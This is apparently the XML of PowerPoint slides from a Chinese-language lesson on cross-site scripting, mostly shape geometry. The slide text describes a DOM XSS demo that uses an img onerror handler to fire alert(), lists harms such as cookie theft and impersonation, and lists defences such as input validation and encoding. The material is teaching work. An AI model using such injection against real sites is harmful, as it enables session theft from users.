        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="1600200"/>
            <a:ext cx="10400030" cy="1476375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>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会直接在img标签中插入onerror事件，该语句表示当图片加载出错的时候，自动触发后面的 alert()函数，来达到弹窗的效果，这就是一个最简单的 DOM 型 XSS 漏洞。效果如图10-4所示。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5" descr="4"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3581400" y="2667000"/>
            <a:ext cx="5223510" cy="3649345"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4800600" y="6400800"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图10-4弹窗效果示意图</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9280525" y="3810000"/>
            <a:ext cx="2749550" cy="2139950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>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反射型XSS和存储型XSS两种类型实现的结果是完全相同，不同的是前者需要点击，后者存在于网页的数据库内。</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7" name="TextBox 7"/>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XSS攻击的危害</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5" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="1600200"/>
            <a:ext cx="10400030" cy="3784600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>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XSS攻击以其灵活性成为黑客常用的技术手段。尽管它不直接提供如SQL注入般的高权限访问，但通过创造性思维与其他技术结合，XSS的破坏力十分显著。XSS的主要危害包括：</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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(1) 盗用Cookie和敏感信息，使攻击者能冒充管理员操作后台；</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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(2) 利用Flash或Java等提升权限；</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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(3) 发送垃圾信息，干扰用户正常使用；</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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(4) 冒充用户身份，执行不当操作或窃取个人信息；</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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(5) 通过高访问量的页面实现DDOS攻击。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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面对XSS攻击的广泛威胁，网站运营者和用户需提高警惕，采取有效预防措施。</a:t>
            </a:r>
            <a:endParaRPr sz="20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7" name="TextBox 7"/>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XSS攻击的防范</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5" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="1600200"/>
            <a:ext cx="10400030" cy="3322955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>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XSS漏洞的防范措施具体包括如下：</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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（1）不要打开陌生邮件；电脑一定要安装杀毒软件，定期扫描系统、查杀病毒，及时更新病毒库、更新系统补丁。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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（2）对输入的字符串进行验证。如仅接受规定长度、适当格式、预期内容，其余的一律过滤。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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（3）将使用者输入的字符串进行编码处理。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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（4）开发者尽力消除危险的注入点。</a:t>
            </a:r>
            <a:endParaRPr sz="20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8877300" y="5857875"/>
            <a:ext cx="3314700" cy="1000125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3314700" h="1000125">
                <a:moveTo>
                  <a:pt x="3314700" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1000125" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="951670" y="1153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="903811" y="4578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="856598" y="10222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="810086" y="18033"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="764326" y="27959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="719370" y="39946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="675271" y="53944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="632081" y="69898"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="589853" y="87758"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="548640" y="107470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="508492" y="128982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="469464" y="152243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="431607" y="177198"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="394974" y="203797"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="359617" y="231986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="325588" y="261713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="292941" y="292926"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="261727" y="325573"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231998" y="359601"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="203808" y="394957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="177208" y="431590"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="152252" y="469446"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128991" y="508475"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107477" y="548622"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="87764" y="589836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69903" y="632064"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53947" y="675255"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39949" y="719355"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27961" y="764312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18034" y="810074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10223" y="856588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4578" y="903803"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1153" y="951665"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1000122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3314700" y="1000124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3314700"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3" name="Freeform 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9186926" y="5424551"/>
            <a:ext cx="3005455" cy="1433830"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3005454" h="1433829">
                <a:moveTo>
                  <a:pt x="120209" y="1433448"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="89849" y="1374297"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71583" y="1332494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55258" y="1289692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40930" y="1245945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28654" y="1201308"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18486" y="1155837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10481" y="1109588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4695" y="1062616"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1183" y="1014976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="966724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1183" y="918471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4695" y="870831"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10481" y="823859"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18486" y="777611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28654" y="732142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40930" y="687507"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55258" y="643761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71583" y="600960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89849" y="559160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="110002" y="518416"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="131985" y="478782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="155744" y="440315"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="181223" y="403070"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208367" y="367101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="237120" y="332466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267427" y="299218"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="299233" y="267413"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="332481" y="237107"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="367117" y="208355"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="403086" y="181213"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="440332" y="155735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="478799" y="131977"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="518432" y="109995"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="559177" y="89843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="600976" y="71577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="643776" y="55254"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="687520" y="40926"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="732154" y="28652"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="777622" y="18485"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="823868" y="10480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="870837" y="4695"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="918474" y="1182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="966724" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3005074" y="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 name="Freeform 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="110680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 name="Freeform 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1090612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 name="Freeform 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="107346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 name="Freeform 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="105727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 name="Freeform 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10429875" y="5648325"/>
            <a:ext cx="19050" cy="419100"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="19050" h="419100">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="419100"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="381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9" name="Freeform 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="102393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0" name="Freeform 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11482451" y="2908195"/>
            <a:ext cx="709930" cy="1092835"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="709929" h="1092835">
                <a:moveTo>
                  <a:pt x="0" y="1092304"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="949" y="1044230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3772" y="996637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8435" y="949562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14900" y="903040"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23133" y="857107"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33098" y="811799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44758" y="767150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58079" y="723198"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73024" y="679978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89558" y="637525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107645" y="595875"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="127250" y="555064"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="148336" y="515128"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="170868" y="476102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194811" y="438022"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="220128" y="400924"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="246784" y="364843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274743" y="329815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="303969" y="295876"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="334427" y="263062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="366081" y="231408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="398895" y="200950"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="432834" y="171723"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="467862" y="143764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="503943" y="117109"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="541041" y="91792"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="579121" y="67849"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="618147" y="45317"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="658083" y="24231"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="698894" y="4626"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="709549"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1" name="Freeform 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11482451" y="4000500"/>
            <a:ext cx="709930" cy="1092835"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="709929" h="1092835">
                <a:moveTo>
                  <a:pt x="709549" y="1092410"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="658083" y="1068174"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="618147" y="1047084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="579121" y="1024547"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="541041" y="1000601"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="503943" y="975279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="467862" y="948619"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="432834" y="920655"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="398895" y="891425"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="366081" y="860962"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="334427" y="829303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="303969" y="796484"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274743" y="762541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="246784" y="727508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="220128" y="691423"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194811" y="654320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="170868" y="616236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="148336" y="577206"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="127250" y="537266"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107645" y="496451"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89558" y="454798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73024" y="412342"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58079" y="369118"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44758" y="325163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33098" y="280513"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23133" y="235202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14900" y="189267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8435" y="142744"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3772" y="95667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="949" y="4807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2" name="Freeform 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11528170" y="3067176"/>
            <a:ext cx="388620" cy="439420"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="388620" h="439420">
                <a:moveTo>
                  <a:pt x="388620" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="204470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="373125" y="438912"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38862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3" name="Freeform 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="1085850" cy="3133725"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1085850" h="3133725">
                <a:moveTo>
                  <a:pt x="85725" y="3133724"/>
                </a:moveTo>
                <a:close/>
              </a:path>
              <a:path w="1085850" h="3133725">
                <a:moveTo>
                  <a:pt x="1085850" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3129904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37270" y="3132571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85725" y="3133724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134179" y="3132571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182040" y="3129146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="229254" y="3123501"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="275768" y="3115690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="321530" y="3105763"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="366487" y="3093775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="410587" y="3079777"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="453777" y="3063821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="496006" y="3045960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="537220" y="3026247"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="577367" y="3004733"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="616396" y="2981472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="654252" y="2956516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="690885" y="2929916"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="726242" y="2901726"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="760270" y="2871997"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="792917" y="2840783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="824131" y="2808136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="853859" y="2774107"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="882048" y="2738750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="908647" y="2702117"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="933603" y="2664260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="956864" y="2625232"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="978376" y="2585085"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="998089" y="2543871"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1015949" y="2501643"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1031904" y="2458453"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1045902" y="2414354"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1057890" y="2369398"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1067816" y="2323638"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1075627" y="2277126"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1081271" y="2229913"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1084696" y="2182054"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1085850" y="2133600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108585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4" name="Freeform 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="553260" y="0"/>
            <a:ext cx="2360930" cy="1081405"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2360930" h="1081405">
                <a:moveTo>
                  <a:pt x="2360640" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2351430" y="74967"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2343262" y="120902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2333376" y="166213"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2321806" y="210863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2308590" y="254818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2293762" y="298042"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2277358" y="340498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2259412" y="382151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2239961" y="422966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2219041" y="462906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2196685" y="501936"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2172931" y="540020"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2147812" y="577123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2121366" y="613208"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2093626" y="648241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2064629" y="682184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2034410" y="715003"/>
                </a:lnTo>
                <a:lnTo>
